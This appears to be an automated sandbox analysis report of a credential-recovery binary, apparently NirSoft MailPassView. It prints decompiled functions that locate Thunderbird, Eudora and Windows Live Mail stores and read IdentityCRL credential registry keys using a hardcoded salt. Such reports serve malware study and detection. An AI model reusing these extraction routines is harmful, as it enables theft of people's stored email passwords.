Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4

strcpy.MSVCRT(?,00000000), ref: 00402199
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE

Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F

Strings

current, xrefs: 00401F61
%s\Main, xrefs: 0040204C
Thunderbird\Profiles, xrefs: 00401F0F, 00401F3D
nss3.dll, xrefs: 004020FF, 00402127
Install Directory, xrefs: 0040205F
Mozilla\Profiles, xrefs: 00401EC0, 00401EC5, 00401EED
sqlite3.dll, xrefs: 00401FF6, 004020C2, 004020E7
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current, xrefs: 00401F8C
Software\Qualcomm\Eudora\CommandLine, xrefs: 00401F66
%programfiles%\Mozilla Thunderbird, xrefs: 004021B9
Software\Mozilla\Mozilla Thunderbird, xrefs: 00401FA8

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
API String ID: 2492260235-4223776976
Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4;
				_t49 = E00404837(__ecx);
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}

0x0040b9bf
0x0040b9c4
0x0040b9cb
0x0040b9d3
0x0040b9dc
0x0040b9e1
0x0040b9e7
0x0040b9ef
0x0040b9f3
0x0040b9f7
0x0040b9fb
0x0040b9ff
0x0040ba0c
0x0040ba13
0x0040ba24
0x0040ba29
0x0040ba2b
0x0040ba41
0x0040ba52
0x0040ba57
0x0040ba59
0x0040ba7c
0x0040ba86
0x0040ba8c
0x0040ba96
0x0040bab7
0x0040babb
0x0040bb09
0x0040bb0a
0x0040bb14
0x0040bb19
0x0040bb21
0x0040bb27
0x0040bb23
0x0040bb23
0x0040bb23
0x0040bb30
0x0040bb3d
0x0040bb51
0x0040bb5c
0x0040bb6f
0x0040bb71
0x0040bb73
0x0040bbe3
0x0040bbe3
0x00000000
0x0040bb75
0x0040bb7b
0x0040bb8e
0x0040bb94
0x0040bb96
0x00000000
0x00000000
0x0040bb98
0x0040bb9d
0x0040bb9f
0x0040bbad
0x0040bbb9
0x0040bbbb
0x0040bbbd
0x0040bbc4
0x0040bbcf
0x0040bbcf
0x00000000
0x0040bbbd
0x0040bba7
0x0040bba9
0x0040bbab
0x00000000
0x00000000
0x00000000
0x0040bbd5
0x0040bbdd
0x0040bbdf
0x0040bbdf
0x00000000
0x0040bb7b
0x0040bb73
0x0040bac1
0x0040bac6
0x0040bac8
0x0040bb07
0x0040bb07
0x00000000
0x0040bb07
0x0040baca
0x0040bad1
0x0040bad9
0x0040bade
0x0040bae7
0x0040baf4
0x0040bafa
0x0040bafa
0x00000000
0x0040bae7
0x0040baa5
0x00000000
0x0040baa5
0x0040ba65
0x00000000
0x0040ba2d
0x0040ba2d
0x0040ba37
0x0040bbe9
0x0040bbe9
0x0040bbf0
0x0040bbf8
0x0040bbfd
0x0040bc05
0x0040bc0e
0x0040bc14
0x0040bc14
0x0040bc1b
0x0040bc1f
0x0040bc27
0x0040bc30
0x0040bc39
0x0040bc3e
0x0040bc3e
0x00000000
0x0040bc3e
0x0040b9cd
0x0040b9cd
0x0040bc40
0x0040bc46
0x0040bc46

APIs

Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,74784DE0,?,00000000,?,?,?,0040B9C9,74784DE0), ref: 00404856
Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74784DE0), ref: 0040487C
Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7

??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
DeleteObject.GDI32(?), ref: 0040BC0E

Strings

, xrefs: 0040B9E7
/deleteregkey, xrefs: 0040BA4D
Error, xrefs: 0040BA9A
/savelangfile, xrefs: 0040BA1F
Software\NirSoft\MailPassView, xrefs: 0040BA5B
Failed to load the executable file !, xrefs: 0040BA9F

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
API String ID: 745651260-414181363
Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}

0x0040725d
0x00407268
0x0040726c
0x00407270
0x00407274
0x00407278
0x0040727c
0x00407280
0x00407284
0x00407288
0x0040728c
0x00407290
0x00407294
0x00407298
0x0040729c
0x004072a0
0x004072a4
0x004072a8
0x004072ae
0x004072bc
0x004072c2
0x004072d5
0x004072dc
0x004072ea
0x004072f1
0x004072fc
0x0040730d
0x00407310
0x00407313
0x00407324
0x00407327
0x00407346
0x0040735b
0x00407369
0x00407373
0x00407378
0x0040737b
0x00407385
0x00407390
0x00407395
0x00407397
0x0040739d
0x004073a0
0x004073a6
0x004073ac
0x004073ac
0x004073b0
0x004073b3
0x004073bc
0x004073be
0x004073c5
0x004073c6
0x0040739d
0x004073ce
0x004073d0
0x004073d3
0x004073d9
0x004073df
0x004073df
0x004073e8
0x004073eb
0x004073f4
0x004073f6
0x004073f9
0x004073fa
0x004073d0
0x00407403

APIs

memset.MSVCRT ref: 004072AE
memset.MSVCRT ref: 004072C2
memset.MSVCRT ref: 004072DC
memset.MSVCRT ref: 004072F1
GetComputerNameA.KERNEL32 ref: 00407313
GetUserNameA.ADVAPI32(?,?), ref: 00407327
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
strlen.MSVCRT ref: 00407364
strlen.MSVCRT ref: 00407373
memcpy.MSVCRT ref: 00407385

Strings

}, xrefs: 004072A0
}, xrefs: 00407294
O, xrefs: 00407298
H, xrefs: 004072A4
i, xrefs: 00407274
b, xrefs: 0040727C
5, xrefs: 00407290

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}

0x0040da04
0x0040da2a
0x0040da2e
0x0040db30
0x0040db36
0x0040db36
0x0040da44
0x0040da48
0x0040db26
0x0040db2a
0x00000000
0x0040db2a
0x0040da67
0x0040da6f
0x0040da75
0x0040da77
0x0040da80
0x0040da8c
0x0040da96
0x0040daa0
0x0040daa4
0x0040dab4
0x0040dabb
0x0040dabf
0x0040daca
0x0040dad4
0x0040dadd
0x0040daf2
0x0040db0d
0x0040db0d
0x0040db16
0x0040db16
0x0040daca
0x0040da8c
0x0040db20
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

memcpy.MSVCRT ref: 0040DADD
memcpy.MSVCRT ref: 0040DAF2

Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858

LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A

Strings

Software\Microsoft\IdentityCRL, xrefs: 0040DA20
Value, xrefs: 0040DA5E
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 0040DAB4, 0040DADB
Dynamic Salt, xrefs: 0040DA3B

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
API String ID: 2768085393-1693574875
Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}

0x00411654
0x00411656
0x0041165b
0x00411669
0x00411670
0x00411691
0x00411691
0x00411672
0x00411675
0x0041167d
0x00000000
0x0041167f
0x0041167f
0x00411688
0x004116a9
0x004116ad
0x00000000
0x004116af
0x004116af
0x004116b1
0x00000000
0x004116b1
0x0041168a
0x0041168f
0x00411696
0x0041169d
0x00000000
0x0041169f
0x0041169f
0x004116a1
0x004116b7
0x004116b7
0x004116b7
0x004116ba
0x004116ba
0x00000000
0x00000000
0x00000000
0x0041168f
0x00411688
0x0041167d
0x004116bd
0x004116c2
0x004116c9
0x004116d0
0x004116d7
0x004116dd
0x004116e3
0x004116e5
0x004116eb
0x004116f1
0x004116fa
0x004116ff
0x00411704
0x0041170a
0x00411711
0x00411717
0x00411717
0x00411718
0x0041171d
0x00411722
0x00411727
0x0041172c
0x00411731
0x00411750
0x00411753
0x00411758
0x0041175d
0x0041176a
0x0041176c
0x00411772
0x004117ae
0x004117ae
0x004117b1
0x00000000
0x00000000
0x004117b3
0x004117b4
0x004117b4
0x00411774
0x00411774
0x00411774
0x00411775
0x00411778
0x0041177a
0x00411785
0x00411787
0x00411787
0x00411788
0x00411788
0x00411785
0x0041178b
0x0041178b
0x0041178f
0x00000000
0x00000000
0x00411795
0x0041179c
0x004117a2
0x004117a6
0x004117bb
0x004117a8
0x004117a8
0x004117a8
0x004117c3
0x004117c8
0x004117ca
0x004117d0
0x004117d3
0x004117d3
0x004117d9
0x0041180e
0x00411819

APIs

GetModuleHandleA.KERNEL32(00000000,004123E0,00000070), ref: 00411669
__set_app_type.MSVCRT ref: 004116C2
__p__fmode.MSVCRT ref: 004116D7
__p__commode.MSVCRT ref: 004116E5
__setusermatherr.MSVCRT ref: 00411711
_initterm.MSVCRT ref: 00411727
__getmainargs.MSVCRT ref: 0041174A
_initterm.MSVCRT ref: 0041175D
GetStartupInfoA.KERNEL32(?), ref: 0041179C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004117C0
exit.KERNELBASE ref: 004117D3
_cexit.MSVCRT ref: 004117D9

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}

0x00410d1b
0x00410d37
0x00410d3c
0x00410d49
0x00410d4a
0x00410d4e
0x00410d55
0x00410d5f
0x00410d64
0x00410d6d
0x00410d72
0x00410d7b
0x00410d7c
0x00410d86
0x00410d92
0x00410da2
0x00410daa
0x00410dbd
0x00410dc5
0x00410de5
0x00410dea
0x00410dfe
0x00410e0c
0x00410e14
0x00410e16
0x00410e20
0x00410e22
0x00410e22
0x00410e20
0x00410e2c
0x00410e2d
0x00410e31
0x00410e32
0x00410e37
